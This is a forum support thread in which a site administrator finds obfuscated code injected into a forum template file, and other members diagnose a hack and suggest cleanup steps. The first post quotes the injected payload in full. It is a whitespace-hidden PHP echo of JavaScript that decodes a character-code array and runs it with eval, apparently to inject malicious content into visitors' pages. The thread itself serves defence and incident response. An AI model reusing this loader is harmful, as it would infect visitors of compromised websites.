Strange Code appearance

[[Crash_Override]]

logged into my forum this morning and noticed the text was larger, so I checked all the settings in the admin panel and they were correct. downloaded the index.template.php file and noticed an extra amount of code that had been inserted last night.

Code Select Expand


<?
#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}catch(gdsgsdg){dbshre=231;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,92,112,112,95,92,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,6,4,27,23,24,25,91,116,111,94,91,40,110,105,91,25,55,27,30,96,109,110,107,49,39,40,109,111,105,89,93,95,95,92,100,101,95,107,88,106,104,102,96,37,89,107,93,99,96,110,98,92,92,106,107,104,40,100,107,39,107,95,103,37,104,97,106,34,50,5,3,26,27,23,24,90,115,115,93,90,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,25,55,27,30,89,91,109,106,99,109,109,95,34,50,5,3,26,27,23,24,90,115,115,93,90,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,91,116,111,94,91,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,89,114,114,97,89,38,108,110,116,99,93,39,113,100,91,108,97,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,91,116,111,94,91,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,92,112,112,95,92,41,106,108,114,102,96,37,108,104,106,27,52,24,32,43,107,111,31,52,7,5,4,2,25,26,27,23,97,95,26,35,24,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,89,114,114,97,89,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,90,115,115,93,90,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,92,112,112,95,92,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,92,112,112,95,92,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-510!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";

#/336988#
?>


Not sure if this is a security problem or paranoia but would like to know WTH this code is doing in and actually does to my forum?

[NanoSector]

It looks like you have been hacked.

Please refer to: http://wiki.simplemachines.org/smf/I_think_I_have_been_hacked

The page will provide you instructions for removing the hack and preventing it from happening again.

Good luck, post back if you need any help

[emanuele]

It seems related to hacks on some systems:
https://www.phpbb.com/community/viewtopic.php?f=46&t=2167644
http://evolution-xtreme.com/modules.php?name=Forums&file=viewtopic&p=39217
Found also something on wordpress, but there was no code.
It seems to add some javascript too.

I'd suggest you to "cleanup" everything (that could mean: check all your files to be sure not to have strange code around, up to delete all the files and start fresh, depending on your tastes) and maybe give a nudge to your host.

ETA: in other words, what Yoshi said!

[NanoSector]

I found the phpBB link as well, though it gave too little information about what the hack is or what caused the hole for them.

* Yoshi2889 loves hijacking people

[kat]

Can you change your avatar, please, CO?

It contains a virus (Probably due to your site being hacked).

[NanoSector]

Can you change your avatar, please, CO?

It contains a virus (Probably due to your site being hacked).

Chrome for mobile refuses to display anything there, so could be a virus yes. Opening it in a new tab redirects me to what I suppose is your forum.

[emanuele]

His avatar is an attachment on his own forum that is in maintenance mode so it's "broken"

[[Crash_Override]]

well I have taken the following measures:

1.) Removed all installed mods & themes

2.) Put the forum into Maintenence moode

3.) Run the small update utility to full patch my forum to 2.0.3

4.) ran the kb_scan utility, all green

5.) Did check the avatar, all is well there

@ K@: If I still need to change the avatar please let me know

@Yoshi2889: if you got to the site 1013clan.com, yes that is my forum.  It may be in maintenance mode when you visited as I had already started the procedure I listed above after writing this

Anything else I should do or mention in particular to my host about this issue? Thanks again folks

[kat]

His avatar is an attachment on his own forum that is in maintenance mode so it's "broken"

Surely, that wouldn't throw-up a virus warning, though?

[emanuele]

His avatar is an attachment on his own forum that is in maintenance mode so it's "broken"

Surely, that wouldn't throw-up a virus warning, though?

Depends on the AV I can imagine (since it expects an image and instead it gets a web page he may become a bit upset), but not using one I don't know...

[emanuele]

well I have taken the following measures:

Do you have any other script on your site? (blog, CMS, other)
In that case I'd clean that too.

[kat]

The warning seems to have gone, now. So, all's good.

Opera just shows a blank space, or a placeholder, if an image is borked.

[NanoSector]

The warning seems to have gone, now. So, all's good.

Opera just shows a blank space, or a placeholder, if an image is borked.

Same for chrome, 'pparently
Avast Mobile didn't go weird though, so I figured it would be okay for a good deal. (It scans Windows viruses afaik)

Anyways I edited the page to add a link to the security tips page.
Security Tips
Might be worth looking at